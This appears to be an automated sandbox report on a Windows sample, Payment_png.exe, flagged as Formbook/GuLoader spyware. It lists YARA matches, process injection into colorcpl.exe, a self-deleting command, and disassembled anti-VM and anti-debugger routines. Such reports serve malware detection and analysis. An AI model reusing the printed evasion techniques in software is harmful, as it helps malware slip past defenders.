Source: C:\Windows\explorer.exe | Code function: 6_2_0613B7C7
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CC4496
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CCD466
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C2B477
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C1841F
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD25DD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C1D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C32581
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CC2D82
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD1D55
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD2D07
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C00D20
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD2EF7
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CCD616
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C26E30
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CDDFCE
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD1FF1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD28EC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C1B090
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C320A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD20A8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CC1002
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CDE824
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C2A830
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C299BF
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C0F900
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C24120
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CC4AEF
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD22AE
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CBFA2B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C2B236
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CC03DA
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C3ABD8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CCDBD2
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CB23E3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C3138B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C3EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C2AB40
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CACB4F
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C2A309
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04CD2B28
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00958C5B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00958C60
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00952D90
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00952D8F
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00952FB0
Source: C:\Users\user\Desktop\Payment_png.exe | Code function: String function: 1E3AB150 appears 136 times
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 04C0B150 appears 136 times
Source: Payment_png.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Payment_png.exe, 00000000.00000000.200466328.0000000000417000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.313895649.000000001DC50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.313927300.000000001DEF0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.305998798.00000000000B3000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment_png.exe
Source: Payment_png.exe, 00000002.00000000.245916312.0000000000417000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
Source: Payment_png.exe | Binary or memory string: OriginalFilenametempelhallerne.exe vs Payment_png.exe
Source: Payment_png.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/0@13/7
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_01
Source: C:\Users\user\Desktop\Payment_png.exe | File created: C:\Users\user\AppData\Local\Temp\~DF404ACC61CD765358.TMP
Source: Payment_png.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Payment_png.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\Payment_png.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Payment_png.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Payment_png.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Payment_png.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Payment_png.exe | Virustotal: Detection: 70%
Source: Payment_png.exe | Metadefender: Detection: 19%
Source: Payment_png.exe | ReversingLabs: Detection: 79%
Source: unknown | Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Users\user\Desktop\Payment_png.exe | Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_png.exe | Process created: C:\Users\user\Desktop\Payment_png.exe 'C:\Users\user\Desktop\Payment_png.exe'
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment_png.exe'
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: colorcpl.pdbGCTL source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: colorcpl.pdb source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Payment_png.exe, 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Payment_png.exe, colorcpl.exe
      Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Payment_png.exe PID: 6076, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: Payment_png.exe PID: 3112, type: MEMORY
      Source: Yara match | File source: Process Memory Space: Payment_png.exe PID: 6076, type: MEMORY
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_00408843 push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_00405E7A push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_004050B4 push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_00408944 push esp; iretd
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3FD0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_04C5D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00960109 push ss; ret
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_00965268 push esp; iretd
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0096B3B5 push eax; ret
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0096B402 push eax; ret
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0096B40B push eax; ret
      Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 14_2_0096B46C push eax; ret
      Source: C:\Users\user\Desktop\Payment_png.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02222C06
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_00562C06
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 00000000022201BA second address: 00000000022201BA instructions:
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002224607 second address: 0000000002224607 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA74E07F08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007FEA74E07EECh 0x0000002e call 00007FEA74E07F77h 0x00000033 call 00007FEA74E07F18h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002222CE8 second address: 0000000002222CE8 instructions:
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002222DFA second address: 0000000002222DFA instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\Payment_png.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Payment_png.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Payment_png.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Payment_png.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Payment_png.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 00000000022201BA second address: 00000000022201BA instructions:
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002224607 second address: 0000000002224607 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FEA74E07F08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007FEA74E07EECh 0x0000002e call 00007FEA74E07F77h 0x00000033 call 00007FEA74E07F18h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002224627 second address: 0000000002224627 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA74DAB2BFh 0x0000001d popad 0x0000001e call 00007FEA74DAAF98h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 00000000022244B4 second address: 0000000002224627 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add dword ptr [ebp+0000009Ch], 01h 0x0000000a add edi, edx 0x0000000c dec ecx 0x0000000d test ebx, 6012DFB5h 0x00000013 cmp ecx, 00000000h 0x00000016 jne 00007FEA74E07EA8h 0x00000018 push ecx 0x00000019 call 00007FEA74E07FB1h 0x0000001e call 00007FEA74E08000h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002222CE8 second address: 0000000002222CE8 instructions:
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000002222DFA second address: 0000000002222DFA instructions:
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 0000000000564627 second address: 0000000000564627 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FEA74DAB2BFh 0x0000001d popad 0x0000001e call 00007FEA74DAAF98h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 00000000005644B4 second address: 0000000000564627 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add dword ptr [ebp+0000009Ch], 01h 0x0000000a add edi, edx 0x0000000c dec ecx 0x0000000d test ebx, 6012DFB5h 0x00000013 cmp ecx, 00000000h 0x00000016 jne 00007FEA74E07EA8h 0x00000018 push ecx 0x00000019 call 00007FEA74E07FB1h 0x0000001e call 00007FEA74E08000h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 000000000095897E second address: 0000000000958984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02220604 rdtsc
      Source: C:\Windows\explorer.exe TID: 3096 | Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 632 | Thread sleep time: -34000s >= -30000s
      Source: C:\Windows\SysWOW64\colorcpl.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000006.00000000.289998327.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000006.00000002.481359451.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000006.00000000.290185657.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000006.00000000.290294461.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Payment_png.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000006.00000000.289700052.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Payment_png.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02220438 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\Payment_png.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Payment_png.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02220604 rdtsc
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022228D0 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02222415 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02224B11 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221369 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02224377 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_022219A3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02221986 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 0_2_02223BE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3AE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E461608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E45FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E478ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E43FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E4246A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3D36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CB73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3CF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E478F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E47070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Payment_png.exe | Code function: 2_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]
